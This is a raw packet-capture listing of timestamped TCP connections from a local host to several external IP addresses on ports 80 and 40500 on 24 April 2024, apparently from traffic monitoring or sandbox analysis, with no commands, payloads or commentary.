Apr 24, 2024 10:08:10.936954975 CEST	80	49734	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:10.955291986 CEST	49732	40500	192.168.2.6	213.230.90.222
Apr 24, 2024 10:08:11.439623117 CEST	49734	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:11.784271955 CEST	80	49734	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:13.816473007 CEST	49735	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:14.158364058 CEST	80	49735	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:14.658349037 CEST	49735	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:14.999109030 CEST	80	49735	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:15.505426884 CEST	49735	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:15.846893072 CEST	80	49735	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:16.361584902 CEST	49735	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:16.703388929 CEST	80	49735	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:17.205246925 CEST	49735	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:17.546173096 CEST	80	49735	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:18.955264091 CEST	49732	40500	192.168.2.6	213.230.90.222
Apr 24, 2024 10:08:19.589282990 CEST	49737	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:19.935230017 CEST	80	49737	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:20.439620972 CEST	49737	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:20.781301975 CEST	80	49737	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:21.283418894 CEST	49737	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:21.625406981 CEST	80	49737	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:22.127140045 CEST	49737	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:22.470542908 CEST	80	49737	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:22.986505032 CEST	49737	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:23.328135014 CEST	80	49737	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:25.348347902 CEST	49738	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:25.685530901 CEST	80	49738	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:26.189618111 CEST	49738	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:26.527950048 CEST	80	49738	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:27.033500910 CEST	49738	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:27.370693922 CEST	80	49738	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:27.877100945 CEST	49738	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:28.215179920 CEST	80	49738	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:28.720966101 CEST	49738	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:29.058104038 CEST	80	49738	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:29.955957890 CEST	49739	40500	192.168.2.6	5.232.84.160
Apr 24, 2024 10:08:30.971062899 CEST	49739	40500	192.168.2.6	5.232.84.160
Apr 24, 2024 10:08:31.088591099 CEST	49740	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:31.428349018 CEST	80	49740	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:31.939615011 CEST	49740	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:32.279238939 CEST	80	49740	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:32.783359051 CEST	49740	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:32.970875978 CEST	49739	40500	192.168.2.6	5.232.84.160
Apr 24, 2024 10:08:33.125005007 CEST	80	49740	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:33.627300024 CEST	49740	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:33.969239950 CEST	80	49740	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:34.470917940 CEST	49740	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:34.810771942 CEST	80	49740	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:36.986512899 CEST	49739	40500	192.168.2.6	5.232.84.160
Apr 24, 2024 10:08:38.240746021 CEST	49742	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:38.581753016 CEST	80	49742	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:39.142874956 CEST	49742	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:39.501715899 CEST	80	49742	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:40.158488989 CEST	49742	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:40.498399019 CEST	80	49742	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:41.048990965 CEST	49742	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:41.389683962 CEST	80	49742	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:41.955240965 CEST	49742	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:42.295104027 CEST	80	49742	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:45.142757893 CEST	49739	40500	192.168.2.6	5.232.84.160
Apr 24, 2024 10:08:45.410679102 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:45.410924911 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:45.750452995 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:45.750617981 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:45.750771046 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:45.877206087 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.112960100 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113019943 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113060951 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113095045 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113097906 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113125086 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113136053 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113137007 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113173962 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113184929 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113215923 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113220930 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113254070 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113256931 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113296032 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113311052 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113351107 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113357067 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113392115 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.113405943 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.113449097 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.114044905 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.114079952 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.467940092 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.467992067 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468077898 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468090057 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468116045 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468137980 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468178034 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468193054 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468210936 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468228102 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468235016 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468252897 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468255043 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468271017 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468275070 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468290091 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468312979 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468327045 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468338966 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468344927 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468379974 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468398094 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468403101 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468425035 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468432903 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468456030 CEST	80	49743	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:46.468456984 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468472958 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.468506098 CEST	49743	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:46.783437967 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:48.144546032 CEST	49744	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:48.481673956 CEST	80	49744	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:48.481750965 CEST	49744	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:48.481939077 CEST	49744	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:48.595859051 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:48.816689968 CEST	80	49744	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:48.816747904 CEST	80	49744	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:48.816818953 CEST	49744	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:50.847337961 CEST	49744	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:50.847634077 CEST	49745	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:51.186285973 CEST	80	49744	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:51.186321974 CEST	80	49745	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:51.186423063 CEST	49744	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:51.186455965 CEST	49745	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:51.186669111 CEST	49745	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:51.522017956 CEST	80	49745	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:51.522084951 CEST	80	49745	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:51.522176981 CEST	49745	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:52.221391916 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:53.551001072 CEST	49745	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:53.551368952 CEST	49746	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:53.890921116 CEST	80	49746	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:53.891022921 CEST	49746	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:53.891180038 CEST	49746	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:53.899315119 CEST	80	49745	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:53.899528027 CEST	49745	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:54.222661018 CEST	80	49746	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:54.222799063 CEST	80	49746	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:54.222872019 CEST	49746	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:56.158996105 CEST	49747	40500	192.168.2.6	195.181.62.5
Apr 24, 2024 10:08:57.236495972 CEST	49747	40500	192.168.2.6	195.181.62.5
Apr 24, 2024 10:08:57.336021900 CEST	49746	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:57.336327076 CEST	49748	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:57.667346001 CEST	80	49746	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:57.667432070 CEST	49746	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:57.671963930 CEST	80	49748	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:57.672036886 CEST	49748	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:57.672339916 CEST	49748	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:58.008270979 CEST	80	49748	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:58.008332014 CEST	80	49748	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:58.008392096 CEST	49748	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:58.580435038 CEST	49748	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:58.916685104 CEST	80	49748	185.215.113.66	192.168.2.6
Apr 24, 2024 10:08:58.919560909 CEST	49748	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:08:59.236515999 CEST	49747	40500	192.168.2.6	195.181.62.5
Apr 24, 2024 10:08:59.642916918 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:09:00.041749001 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:09:00.377682924 CEST	80	49749	185.215.113.66	192.168.2.6
Apr 24, 2024 10:09:00.377816916 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:09:00.391463041 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:09:00.726836920 CEST	80	49749	185.215.113.66	192.168.2.6
Apr 24, 2024 10:09:00.726875067 CEST	80	49749	185.215.113.66	192.168.2.6
Apr 24, 2024 10:09:00.726931095 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:09:03.236515045 CEST	49747	40500	192.168.2.6	195.181.62.5
Apr 24, 2024 10:09:03.769952059 CEST	49750	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:04.118426085 CEST	80	49750	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:04.627115011 CEST	49750	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:04.973732948 CEST	80	49750	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:05.486490011 CEST	49750	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:05.833344936 CEST	80	49750	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:06.348746061 CEST	49750	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:06.697309971 CEST	80	49750	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:07.205266953 CEST	49750	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:07.552788019 CEST	80	49750	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:09.583023071 CEST	49752	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:09.931929111 CEST	80	49752	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:10.439754009 CEST	49752	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:10.786314964 CEST	80	49752	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:11.236517906 CEST	49747	40500	192.168.2.6	195.181.62.5
Apr 24, 2024 10:09:11.299000025 CEST	49752	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:11.647139072 CEST	80	49752	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:12.158426046 CEST	49752	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:12.505916119 CEST	80	49752	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:13.033425093 CEST	49752	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:13.380249023 CEST	80	49752	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:14.220877886 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:09:15.410250902 CEST	49753	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:15.754004002 CEST	80	49753	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:16.267792940 CEST	49753	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:16.611798048 CEST	80	49753	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:17.127281904 CEST	49753	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:17.471709013 CEST	80	49753	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:17.986515999 CEST	49753	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:18.329894066 CEST	80	49753	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:18.830292940 CEST	49753	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:19.175092936 CEST	80	49753	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:21.207667112 CEST	49754	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:21.552704096 CEST	80	49754	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:22.064618111 CEST	49754	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:22.237406015 CEST	49755	40500	192.168.2.6	189.190.10.16
Apr 24, 2024 10:09:22.409415960 CEST	80	49754	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:22.924010038 CEST	49754	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:23.252114058 CEST	49755	40500	192.168.2.6	189.190.10.16
Apr 24, 2024 10:09:23.273631096 CEST	80	49754	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:23.783447027 CEST	49754	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:24.128490925 CEST	80	49754	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:24.642760992 CEST	49754	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:24.988591909 CEST	80	49754	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:25.267745972 CEST	49755	40500	192.168.2.6	189.190.10.16
Apr 24, 2024 10:09:27.019481897 CEST	49756	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:27.362320900 CEST	80	49756	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:27.877110004 CEST	49756	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:28.220160961 CEST	80	49756	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:28.720880032 CEST	49756	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:29.064048052 CEST	80	49756	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:29.299137115 CEST	49755	40500	192.168.2.6	189.190.10.16
Apr 24, 2024 10:09:29.580368996 CEST	49756	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:29.927702904 CEST	80	49756	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:30.533366919 CEST	49756	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:30.727087975 CEST	80	49749	185.215.113.66	192.168.2.6
Apr 24, 2024 10:09:30.727221012 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:09:30.878300905 CEST	80	49756	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:32.911374092 CEST	49757	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:33.257873058 CEST	80	49757	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:33.861537933 CEST	49757	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:34.208472967 CEST	80	49757	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:34.767810106 CEST	49757	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:35.119790077 CEST	80	49757	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:35.658442974 CEST	49757	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:36.005709887 CEST	80	49757	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:36.564694881 CEST	49757	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:09:36.914990902 CEST	80	49757	91.202.233.141	192.168.2.6
Apr 24, 2024 10:09:37.314632893 CEST	49755	40500	192.168.2.6	189.190.10.16
Apr 24, 2024 10:09:39.957530022 CEST	49758	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:40.299612045 CEST	80	49758	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:40.814656019 CEST	49758	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:41.156593084 CEST	80	49758	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:41.658430099 CEST	49758	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:42.001997948 CEST	80	49758	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:42.502144098 CEST	49758	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:42.849708080 CEST	80	49758	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:43.361512899 CEST	49758	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:43.703210115 CEST	80	49758	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:45.722755909 CEST	49760	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:46.071649075 CEST	80	49760	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:46.580255032 CEST	49760	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:46.928555012 CEST	80	49760	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:47.439631939 CEST	49760	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:47.793714046 CEST	80	49760	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:48.331018925 CEST	49761	40500	192.168.2.6	94.141.69.176
Apr 24, 2024 10:09:48.471009016 CEST	49760	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:48.728696108 CEST	40500	49761	94.141.69.176	192.168.2.6
Apr 24, 2024 10:09:48.822792053 CEST	80	49760	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:49.236510038 CEST	49761	40500	192.168.2.6	94.141.69.176
Apr 24, 2024 10:09:49.486623049 CEST	49760	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:49.629074097 CEST	40500	49761	94.141.69.176	192.168.2.6
Apr 24, 2024 10:09:49.835027933 CEST	80	49760	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:50.142788887 CEST	49761	40500	192.168.2.6	94.141.69.176
Apr 24, 2024 10:09:50.543900013 CEST	40500	49761	94.141.69.176	192.168.2.6
Apr 24, 2024 10:09:51.049021006 CEST	49761	40500	192.168.2.6	94.141.69.176
Apr 24, 2024 10:09:51.440973043 CEST	40500	49761	94.141.69.176	192.168.2.6
Apr 24, 2024 10:09:51.863374949 CEST	49762	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:51.955313921 CEST	49761	40500	192.168.2.6	94.141.69.176
Apr 24, 2024 10:09:52.207042933 CEST	80	49762	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:52.347259998 CEST	40500	49761	94.141.69.176	192.168.2.6
Apr 24, 2024 10:09:52.783395052 CEST	49762	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:53.124671936 CEST	80	49762	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:53.674017906 CEST	49762	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:54.020075083 CEST	80	49762	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:54.580378056 CEST	49762	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:54.921925068 CEST	80	49762	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:55.486752033 CEST	49762	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:55.828138113 CEST	80	49762	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:57.362140894 CEST	49763	40500	192.168.2.6	156.212.34.122
Apr 24, 2024 10:09:57.848262072 CEST	49764	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:58.196470976 CEST	80	49764	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:58.471467018 CEST	49763	40500	192.168.2.6	156.212.34.122
Apr 24, 2024 10:09:58.705265045 CEST	49764	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:59.053031921 CEST	80	49764	193.233.132.177	192.168.2.6
Apr 24, 2024 10:09:59.564659119 CEST	49764	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:09:59.917999029 CEST	80	49764	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:00.424140930 CEST	49764	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:00.471055984 CEST	49763	40500	192.168.2.6	156.212.34.122
Apr 24, 2024 10:10:00.772151947 CEST	80	49764	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:01.283389091 CEST	49764	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:01.632337093 CEST	80	49764	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:03.667227983 CEST	49765	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:04.007422924 CEST	80	49765	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:04.486512899 CEST	49763	40500	192.168.2.6	156.212.34.122
Apr 24, 2024 10:10:04.674060106 CEST	49765	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:05.014422894 CEST	80	49765	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:05.580272913 CEST	49765	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:05.920032024 CEST	80	49765	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:06.486546993 CEST	49765	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:06.826278925 CEST	80	49765	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:07.404792070 CEST	49765	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:07.745471954 CEST	80	49765	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:09.771106958 CEST	49766	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:10.112664938 CEST	80	49766	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:10.628104925 CEST	49766	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:10.969331980 CEST	80	49766	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:11.517781973 CEST	49766	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:11.861337900 CEST	80	49766	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:12.361593008 CEST	49766	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:12.486675978 CEST	49763	40500	192.168.2.6	156.212.34.122
Apr 24, 2024 10:10:12.703105927 CEST	80	49766	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:13.205271959 CEST	49766	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:10:13.546413898 CEST	80	49766	193.233.132.177	192.168.2.6
Apr 24, 2024 10:10:16.707855940 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:16.708187103 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.043225050 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.043366909 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.043627977 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.378523111 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.378603935 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.378669024 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.378703117 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.378746986 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.378834963 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.378881931 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.378910065 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.378927946 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.378948927 CEST	80	49767	185.215.113.66	192.168.2.6
